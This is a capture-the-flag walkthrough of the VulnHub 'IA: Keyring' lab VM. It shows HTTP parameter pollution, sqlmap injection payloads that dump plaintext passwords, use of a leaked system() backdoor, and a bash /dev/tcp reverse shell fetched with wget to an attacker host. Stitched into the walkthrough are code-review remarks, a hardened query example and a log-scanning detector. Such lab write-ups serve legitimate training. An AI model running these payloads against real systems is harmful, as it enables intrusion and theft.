
IA: Keyring

VulnHub IA: Keyring box review

Port scanning

┌──(root㉿kakeru)-[/tmp]
└─# nmap -A 192.168.240.230
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-06 18:38 CST
Nmap scan report for 192.168.240.230 (192.168.240.230)
Host is up (0.0020s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:eb:fd:0a:76:8a:2a:75:6e:9b:6e:7b:51:c4:28:db (RSA)
| 256 53:31:35:c0:3a:a0:48:2f:3a:79:f5:56:cd:3c:63:ee (ECDSA)
|_ 256 8d:7b:d3:c9:15:61:03:b1:b5:f1:d2:ed:2c:01:55:65 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 96:BA:A0:CE:70:B8 (Unknown)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 2.01 ms 192.168.240.230 (192.168.240.230)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.97 seconds

Web enumeration

Visiting port 80 shows a login page.

Directory scanning also reveals that the real login page is at login.php.

┌──(root㉿kakeru)-[/tmp]
└─# dirsearch -u 192.168.240.230
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /tmp/reports/_192.168.240.230/_25-02-06_18-40-23.txt

Target: http://192.168.240.230/

[18:40:23] Starting:
[18:40:24] 403 - 280B - /.ht_wsr.txt
[18:40:24] 403 - 280B - /.htaccess.bak1
[18:40:24] 403 - 280B - /.htaccess.orig
[18:40:24] 403 - 280B - /.htaccess.sample
[18:40:24] 403 - 280B - /.htaccess.save
[18:40:24] 403 - 280B - /.htaccess_orig
[18:40:24] 403 - 280B - /.htaccess_extra
[18:40:24] 403 - 280B - /.htaccessBAK
[18:40:24] 403 - 280B - /.htaccess_sc
[18:40:24] 403 - 280B - /.htaccessOLD
[18:40:24] 403 - 280B - /.htaccessOLD2
[18:40:24] 403 - 280B - /.htm
[18:40:24] 403 - 280B - /.html
[18:40:24] 403 - 280B - /.htpasswd_test
[18:40:24] 403 - 280B - /.htpasswds
[18:40:24] 403 - 280B - /.httr-oauth
[18:40:24] 403 - 280B - /.php
[18:40:25] 302 - 561B - /about.php -> index.php
[18:40:28] 302 - 561B - /control.php -> index.php
[18:40:30] 302 - 561B - /home.php -> index.php
[18:40:31] 200 - 746B - /login.php
[18:40:31] 302 - 0B - /logout.php -> index.php
[18:40:34] 403 - 280B - /server-status/
[18:40:34] 403 - 280B - /server-status

Task Completed


I tried brute-forcing the password with Burp Suite, but it didn't find anything.
Going back to the main page, I noticed that registration is also possible, so I created a user with my own username and password and logged in.

The page shows this hint:

HTTP Parameter Pollution or HPP in short is a vulnerability that occurs
due to passing of multiple parameters having same name

This tells us there is an HTTP Parameter Pollution vulnerability, so I tried fuzzing parameter names with wfuzz, but I didn't succeed; I wasn't very familiar with wfuzz.
After watching the group owner's video, my approach was right and wfuzz is indeed the tool; I just wasn't using it correctly.
You also need to take the session cookie from the web page. And my directory scan was incomplete; from now on I'll use gobuster for directory enumeration...

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.240.230 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x .php,.txt,.html -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.240.230
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/home.php (Status: 302) [Size: 561] [--> index.php]
/login.php (Status: 200) [Size: 1466]
/history.php (Status: 200) [Size: 31]
/.html (Status: 403) [Size: 280]
/.php (Status: 403) [Size: 280]
/about.php (Status: 302) [Size: 561] [--> index.php]
/index.php (Status: 200) [Size: 3254]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/control.php (Status: 302) [Size: 561] [--> index.php]

history.php shows no content on the page, so this path is most likely the one to use.
First install the seclists wordlists.

┌──(root㉿kakeru)-[~/tmp]
└─# apt update
Get:1 http://mirrors.aliyun.com/kali kali-rolling InRelease [41.5 kB]
Get:2 http://mirrors.aliyun.com/kali kali-rolling/main arm64 Packages [20.2 MB]
Get:3 http://mirrors.aliyun.com/kali kali-rolling/main arm64 Contents (deb) [47.9 MB]
Get:4 http://mirrors.aliyun.com/kali kali-rolling/non-free arm64 Packages [148 kB]
Get:5 http://mirrors.aliyun.com/kali kali-rolling/non-free arm64 Contents (deb) [825 kB]
Get:6 http://mirrors.aliyun.com/kali kali-rolling/contrib arm64 Packages [97.3 kB]
Get:7 http://mirrors.aliyun.com/kali kali-rolling/contrib arm64 Contents (deb) [179 kB]
Fetched 69.4 MB in 13s (5,413 kB/s)
681 packages can be upgraded. Run 'apt list --upgradable' to see them.

┌──(root㉿kakeru)-[~/tmp]
└─# apt install seclists

Then fuzz the parameter name with wfuzz; it turns up user.

┌──(root㉿kakeru)-[~/tmp]
└─# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.240.230/history.php?FUZZ=kakeru -H 'Cookie: PHPSESSID=fe7jj1h3ab3nh81dubr28mim8g' --hh 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.240.230/history.php?FUZZ=kakeru
Total requests: 4734

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000004339: 200 0 L 5 W 85 Ch "user"

Total time: 0
Processed Requests: 4734
Filtered Requests: 4733
Requests/sec.: 0

Then use this parameter pollution vulnerability to read admin's history.

┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.240.230/history.php?user=admin -H "Cookie: PHPSESSID=fe7jj1h3ab3nh81dubr28mim8g"
Pages visited by user admin<br><br>https://github.com/cyberbot75/keyring<br><br>

The GitHub source code is leaked.
In control.php there is a comment:


<?php
session_start();
if(isset($_SESSION['name']))
{
$servername = "localhost";
$username = "root";
$password = "sqluserrootpassw0r4";
$database = "users";

$conn = mysqli_connect($servername, $username, $password, $database);
$name = $_SESSION['name'];
$date = date('Y-m-d H:i:s');
echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";
$sql = "insert into log (name , page_visited , date_time) values ('$name','control','$date')";

if(mysqli_query($conn,$sql))
{
echo "<br><br>";
echo "Date & Time : ".$date;
}
system($_GET['cmdcntr']); //system() function is not safe to use , dont' forget to remove it in production .
}
else
{
header('Location: index.php');
}
?>

This tells us that whatever is passed in the cmdcntr parameter is executed as a command; the developer never removed it.
But when I tried it directly in the URL, nothing was displayed to me.

I got stuck here. From the video I learned that only the admin account can use this backdoor.
How that was discovered: download the source code and use git diff to find the differences.

(base) kakeru@bogon Downloads % git clone https://github.com/cyberbot75/keyring.git
Cloning into 'keyring'...
remote: Enumerating objects: 21, done.
remote: Counting objects: 100% (21/21), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 21 (delta 9), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (21/21), 6.26 KiB | 3.13 MiB/s, done.
Resolving deltas: 100% (9/9), done.
(base) kakeru@bogon Downloads % cd keyring
(base) kakeru@bogon keyring % git log
commit 9215fbd50358462a5868c04bfe93ea549c101a2b (HEAD -> main, origin/main, origin/HEAD)
Author: cyberbot75 <79827735+cyberbot75@users.noreply.github.com>
Date: Mon Jun 21 19:07:49 2021 +0530

Update control.php

commit d63d664e940253192aa05f4b5afe46204452f574
Author: cyberbot75 <79827735+cyberbot75@users.noreply.github.com>
Date: Mon Jun 21 18:33:18 2021 +0530

Update control.php

commit 460cb9f1bf00701403393d4546797eee17121700
Author: cyberbot75 <79827735+cyberbot75@users.noreply.github.com>
Date: Thu Jun 10 18:56:41 2021 +0530

Update control.php

commit 1a772923c80cb07d621d6e654a4e78819126e0a9
Author: cyberbot75 <79827735+cyberbot75@users.noreply.github.com>
Date: Thu Jun 10 18:55:32 2021 +0530

Add files via upload
(base) kakeru@bogon keyring % git diff 9215fbd50358462a5868c04bfe93ea549c101a2b 460cb9f1bf00701403393d4546797eee17121700
diff --git a/html/control.php b/html/control.php
index 3bb3250..823b4c5 100644
--- a/html/control.php
+++ b/html/control.php
@@ -1,5 +1,3 @@
-Code for staging server
-
<!DOCTYPE html>
<html>
<head>
@@ -53,7 +51,10 @@ if(isset($_SESSION['name']))
$conn = mysqli_connect($servername, $username, $password, $database);
$name = $_SESSION['name'];
$date = date('Y-m-d H:i:s');
- echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";
+
+ if($name==="admin")
+ {
+ echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";
$sql = "insert into log (name , page_visited , date_time) values ('$name','control','$date')";

if(mysqli_query($conn,$sql))
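Review bot: mind the argument order of the git diff command above (9215fbd first, then 460cb9f): the `+` lines in this hunk are the older revision 460cb9f and the `-` lines are HEAD. The `if($name==="admin")` gate that 460cb9f puts around the echo and the log insert does nothing for the INSERT itself, which is still built by interpolation, `values ('$name','control','$date')`, with `$name` coming from `$_SESSION['name']`, i.e. from an account anyone can self-register. Use mysqli_prepare with `$name` as a bound parameter, in both revisions; an admin check is not an input-handling fix.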
@@ -61,7 +62,12 @@ if(isset($_SESSION['name']))
echo "<br><br>";
echo "Date & Time : ".$date;
}
- system($_GET['cmdcntr']); //system() function is not safe to use , dont' forget to remove it in production .
+ system($_GET['timer']); //system() is not safe to use , dont' forget to remove it in latest release .
+ }
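Review bot: renaming the parameter from `cmdcntr` to `timer` and rewording the comment leaves the defect untouched: `system($_GET['timer'])` still hands an unvalidated query-string value to a shell, and the `if($name==="admin")` gate only means an admin session is the price of remote command execution. The `-` side, which is HEAD, drops even that gate. Delete the `system()` call outright instead of carrying a "remove before release" comment; a debug hook for a staging server has no place in any revision that can be deployed.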

First, use sqlmap for the injection.

┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -u 192.168.240.230/history.php?user=kakeru --cookie="PHPSESSID=fe7jj1h3ab3nh81dubr28mim8g" --batch --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.8.12#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:54:45 /2025-02-06/

[20:54:45] [INFO] testing connection to the target URL
[20:54:45] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:54:45] [INFO] testing if the target URL content is stable
[20:54:45] [INFO] target URL content is stable
[20:54:45] [INFO] testing if GET parameter 'user' is dynamic
[20:54:45] [INFO] GET parameter 'user' appears to be dynamic
[20:54:45] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[20:54:45] [INFO] testing for SQL injection on GET parameter 'user'
[20:54:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:54:46] [WARNING] reflective value(s) found and filtering out
[20:54:46] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:54:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:54:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:54:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:54:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:54:46] [INFO] testing 'Generic inline queries'
[20:54:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:54:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:54:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:54:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:54:56] [INFO] GET parameter 'user' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:54:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:54:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:54:56] [INFO] target URL appears to be UNION injectable with 1 columns
[20:54:56] [INFO] GET parameter 'user' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: user (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=kakeru' AND (SELECT 9710 FROM (SELECT(SLEEP(5)))Gxfh) AND 'flol'='flol

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: user=kakeru' UNION ALL SELECT CONCAT(0x7178787871,0x65647271467a6477744472684547474a74614e4e59464276706668634d4f4d5576495a45414a6b72,0x717a6a7a71)-- -
---
[20:54:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[20:54:56] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users

[20:54:56] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.240.230'

[*] ending @ 20:54:56 /2025-02-06/


┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -u 192.168.240.230/history.php?user=kakeru --cookie="PHPSESSID=fe7jj1h3ab3nh81dubr28mim8g" --batch -D users --tables
___
__H__
___ ___["]_____ ___ ___ {1.8.12#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:55:57 /2025-02-06/

[20:55:57] [INFO] resuming back-end DBMS 'mysql'
[20:55:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=kakeru' AND (SELECT 9710 FROM (SELECT(SLEEP(5)))Gxfh) AND 'flol'='flol

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: user=kakeru' UNION ALL SELECT CONCAT(0x7178787871,0x65647271467a6477744472684547474a74614e4e59464276706668634d4f4d5576495a45414a6b72,0x717a6a7a71)-- -
---
[20:55:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[20:55:57] [INFO] fetching tables for database: 'users'
[20:55:58] [WARNING] reflective value(s) found and filtering out
Database: users
[2 tables]
+---------+
| log |
| details |
+---------+

[20:55:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.240.230'

[*] ending @ 20:55:57 /2025-02-06/


┌──(root㉿kakeru)-[~/tmp]
└─# sqlmap -u 192.168.240.230/history.php?user=kakeru --cookie="PHPSESSID=fe7jj1h3ab3nh81dubr28mim8g" --batch -D users -T details --columns --dump
___
__H__
___ ___[.]_____ ___ ___ {1.8.12#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:56:16 /2025-02-06/

[20:56:16] [INFO] resuming back-end DBMS 'mysql'
[20:56:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=kakeru' AND (SELECT 9710 FROM (SELECT(SLEEP(5)))Gxfh) AND 'flol'='flol

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: user=kakeru' UNION ALL SELECT CONCAT(0x7178787871,0x65647271467a6477744472684547474a74614e4e59464276706668634d4f4d5576495a45414a6b72,0x717a6a7a71)-- -
---
[20:56:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[20:56:16] [INFO] fetching columns for table 'details' in database 'users'
[20:56:16] [WARNING] reflective value(s) found and filtering out
Database: users
Table: details
[2 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| name | varchar(20) |
| password | varchar(22) |
+----------+-------------+

[20:56:16] [INFO] fetching columns for table 'details' in database 'users'
[20:56:16] [INFO] fetching entries for table 'details' in database 'users'
Database: users
Table: details
[3 entries]
+--------+-----------------------+
| name | password |
+--------+-----------------------+
| admin | myadmin#p4szw0r4d |
| john | Sup3r$S3cr3t$PasSW0RD |
| kakeru | kakeru |
+--------+-----------------------+

[20:56:16] [INFO] table 'users.details' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.240.230/dump/users/details.csv'
[20:56:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.240.230'

[*] ending @ 20:56:16 /2025-02-06/
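The two defects just confirmed, the `history.php?user=` value spliced into SQL (sqlmap's UNION and time-based findings) and a URL parameter deciding whose history is returned, are easiest to see side by side. The following is an added example and not the box's code: a Python/sqlite3 model of history.php and of the control.php log insert. Table and column names follow the sqlmap output above; the rows, the timestamps and the placeholder passwords are constructed.

```python
import sqlite3

# Seen in the curl output above: the one page admin visited.
PAGE_ADMIN = "https://github.com/cyberbot75/keyring"


def setup_db():
    """In-memory copy of the 'users' database with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE details (name VARCHAR(20), password VARCHAR(22));
        CREATE TABLE log (name VARCHAR(20), page_visited TEXT, date_time TEXT);
        """
    )
    conn.executemany(
        "INSERT INTO details VALUES (?, ?)",
        [("admin", "<placeholder>"), ("john", "<placeholder>"), ("kakeru", "<placeholder>")],
    )
    conn.executemany(
        "INSERT INTO log VALUES (?, ?, ?)",
        [
            ("admin", PAGE_ADMIN, "2021-06-21 19:07:49"),
            ("kakeru", "control", "2025-02-06 18:50:00"),
            ("john", "home", "2025-02-06 18:51:00"),
        ],
    )
    return conn


def vulnerable_history(conn, requested_user):
    """history.php as deployed: the caller picks any user name and the value is
    pasted into the SQL text, so a quote in it rewrites the query."""
    sql = f"SELECT page_visited FROM log WHERE name = '{requested_user}'"
    return [row[0] for row in conn.execute(sql)]


def hardened_history(conn, session_name, requested_user):
    """Fixed handler: identity comes from the server-side session, the URL value
    may only agree with it, and the value travels as a bound parameter."""
    if requested_user != session_name:
        raise PermissionError("history is only visible to its own user")
    sql = "SELECT page_visited FROM log WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (session_name,))]


def is_denied(conn, session_name, requested_user):
    """True when hardened_history refuses the request."""
    try:
        hardened_history(conn, session_name, requested_user)
    except PermissionError:
        return True
    return False


def log_visit(conn, session_name, page, date_time):
    """The control.php INSERT with bound parameters; returns the user's row count."""
    conn.execute(
        "INSERT INTO log (name, page_visited, date_time) VALUES (?, ?, ?)",
        (session_name, page, date_time),
    )
    conn.commit()
    return conn.execute(
        "SELECT COUNT(*) FROM log WHERE name = ?", (session_name,)
    ).fetchone()[0]


if __name__ == "__main__":
    db = setup_db()
    # Logged in as kakeru but asking for admin: the deployed code answers.
    print(vulnerable_history(db, "admin"))
    # A quote in the value turns the WHERE clause into "anything".
    print(vulnerable_history(db, "x' OR '1'='1"))
    # The hardened handler only ever answers for the session user.
    print(hardened_history(db, "kakeru", "kakeru"))
```

The important design point is that the bound parameter and the session check are separate fixes: parameterising the query alone would still let any logged-in user read admin's history, and the session check alone would still leave the INSERT in control.php injectable through a crafted registration name.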

After obtaining admin's password, log in, then use ?cmdcntr on control.php to execute commands and get a reverse shell.
I first tried an nc reverse shell, but it didn't work, so I uploaded a PHP reverse shell instead.

┌──(root㉿kakeru)-[~/tmp]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .

┌──(root㉿kakeru)-[~/tmp]
└─# ls
51224.py aaa b b.txt id_rsa php-reverse-shell.php reports rockyou.txt
a a.txt bbb id pass.txt pspy64 reverse.sh tmp

┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

But although the file was received this way, I didn't know where it ended up and couldn't get a shell.
I initially used php-reverse-shell.php and never managed to reach its path; later, after a hint from the group owner, it turned out the PHP can simply be executed directly.
You can also run ls -al first to check permissions.
So use reverse.sh for the reverse shell and write it to /tmp; the current directory is usually created by root and not writable.

http://192.168.240.230/control.php?cmdcntr=wget%20192.168.240.11/reverse.sh%20-O%20/tmp/re.sh
http://192.168.240.230/control.php?cmdcntr=bash%20/tmp/re.sh
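Every step of this chain leaves a line in Apache's access log: the `history.php?user=` probing, the duplicated-parameter requests the HPP hint refers to, and the two `control.php?cmdcntr=` requests above. The following is an added example, not part of the original post: a small scanner over constructed combined-format log lines modelled on those requests. The client address, timestamps and user agents are invented; the parameter names `cmdcntr` and `timer` are the two the leaked control.php history passes to system().

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log (Apache combined format) modelled on this walkthrough.
SAMPLE_LOG = """\
192.168.240.11 - - [06/Feb/2025:20:58:10 +0800] "GET /index.php HTTP/1.1" 200 3254 "-" "Mozilla/5.0"
192.168.240.11 - - [06/Feb/2025:20:58:31 +0800] "GET /history.php?user=admin HTTP/1.1" 200 85 "-" "curl/8.5.0"
192.168.240.11 - - [06/Feb/2025:20:59:02 +0800] "GET /history.php?user=kakeru&user=admin HTTP/1.1" 200 85 "-" "curl/8.5.0"
192.168.240.11 - - [06/Feb/2025:20:59:40 +0800] "GET /history.php?user=kakeru%27%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 85 "-" "sqlmap/1.8.12"
192.168.240.11 - - [06/Feb/2025:21:10:02 +0800] "GET /control.php?cmdcntr=wget%20192.168.240.11/reverse.sh%20-O%20/tmp/re.sh HTTP/1.1" 200 612 "-" "Mozilla/5.0"
192.168.240.11 - - [06/Feb/2025:21:10:20 +0800] "GET /control.php?cmdcntr=bash%20/tmp/re.sh HTTP/1.1" 200 612 "-" "Mozilla/5.0"
192.168.240.11 - - [06/Feb/2025:21:12:00 +0800] "GET /about.php HTTP/1.1" 302 561 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Query-string names that control.php (HEAD and 460cb9f) feeds to system().
COMMAND_PARAMS = {"cmdcntr", "timer"}
# Cheap markers for the kind of values sqlmap sent against history.php.
SQLI_MARKERS = ("'", "UNION", "SLEEP(")


def scan_access_log(lines):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        parts = urlsplit(m["target"])
        params = parse_qsl(parts.query, keep_blank_values=True)  # decodes %20 etc.
        base = {"client": m["ip"], "timestamp": m["ts"], "path": parts.path}

        # 1. HTTP Parameter Pollution: the same name given more than once.
        names = [k for k, _ in params]
        dupes = sorted({n for n in names if names.count(n) > 1})
        if dupes:
            findings.append({**base, "kind": "hpp", "params": dupes})

        # 2. Injection-looking values in any parameter.
        for k, v in params:
            if any(marker in v.upper() for marker in SQLI_MARKERS):
                findings.append({**base, "kind": "sqli_probe", "param": k, "value": v})

        # 3. The leaked backdoor parameters on control.php, with the command decoded.
        if parts.path.endswith("/control.php"):
            for k, v in params:
                if k in COMMAND_PARAMS:
                    findings.append({**base, "kind": "command_exec", "param": k, "command": v})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f["timestamp"], f["kind"], f.get("command") or f.get("value") or f.get("params"))
```

The decoded `command` field is what makes the control.php findings actionable: `wget ... -O /tmp/re.sh` followed by `bash /tmp/re.sh` from the same client is the download-then-execute pattern to alert on, and the file path it names is where the incident responder should look first.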

┌──(root㉿kakeru)-[~/tmp]
└─# cat reverse.sh
bash -i >& /dev/tcp/192.168.240.11/1234 0>&1

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
pwd
bash: cannot set terminal process group (627): Inappropriate ioctl for device
bash: no job control in this shell
www-data@keyring:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@keyring:/var/www/html$ pwd
/var/www/html
www-data@keyring:/var/www/html$

Upgrading to a proper terminal:

script -qc /bin/bash /dev/null
Ctrl+Z to suspend
stty raw -echo; fg
reset
xterm
On the local machine, run stty -a to check your own rows and columns
stty rows 35 columns 115

Privilege escalation

Neither sudo nor SUID binaries offer anything exploitable.

www-data@keyring:/var/www/html$ sudp -l

Command 'sudp' not found, did you mean:

command 'ssdp' from snap ssdp
command 'sfdp' from deb graphviz
command 'sup' from deb sup
command 'sudo' from deb sudo
command 'sudo' from deb sudo-ldap

See 'snap info <snapname>' for additional versions.

www-data@keyring:/var/www/html$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for www-data:

^C

sudo: 1 incorrect password attempt
www-data@keyring:/var/www/html$
www-data@keyring:/var/www/html$
www-data@keyring:/var/www/html$
www-data@keyring:/var/www/html$ find / -user root -perm -4000 -print 2>/dev/null

/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/gpasswd
/bin/ntfs-3g
/bin/umount
/bin/mount
/bin/ping
/bin/fusermount
/bin/su

Under /home there is a user john, who also showed up in the sqlmap dump!
We can switch to that user.

www-data@keyring:/$ cd home
www-data@keyring:/home$ ls
john
www-data@keyring:/home$ su - john
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

john@keyring:~$

A file in john's own home directory has the SUID bit set.

john@keyring:~$ find / -user root -perm -4000 -print 2>/dev/null
/home/john/compress
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/gpasswd
/bin/ntfs-3g
/bin/umount
/bin/mount
/bin/ping
/bin/fusermount
/bin/su

It's an executable, but I got stuck again.
From the video: just run strings on the file.

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234 > compress

john@keyring:~$ cat compress > /dev/tcp/192.168.240.11/1234
john@keyring:~$

┌──(root㉿kakeru)-[~/tmp]
└─# strings compress
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
/bin/tar cf archive.tar *
:*3$"
GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8060
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
tar.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
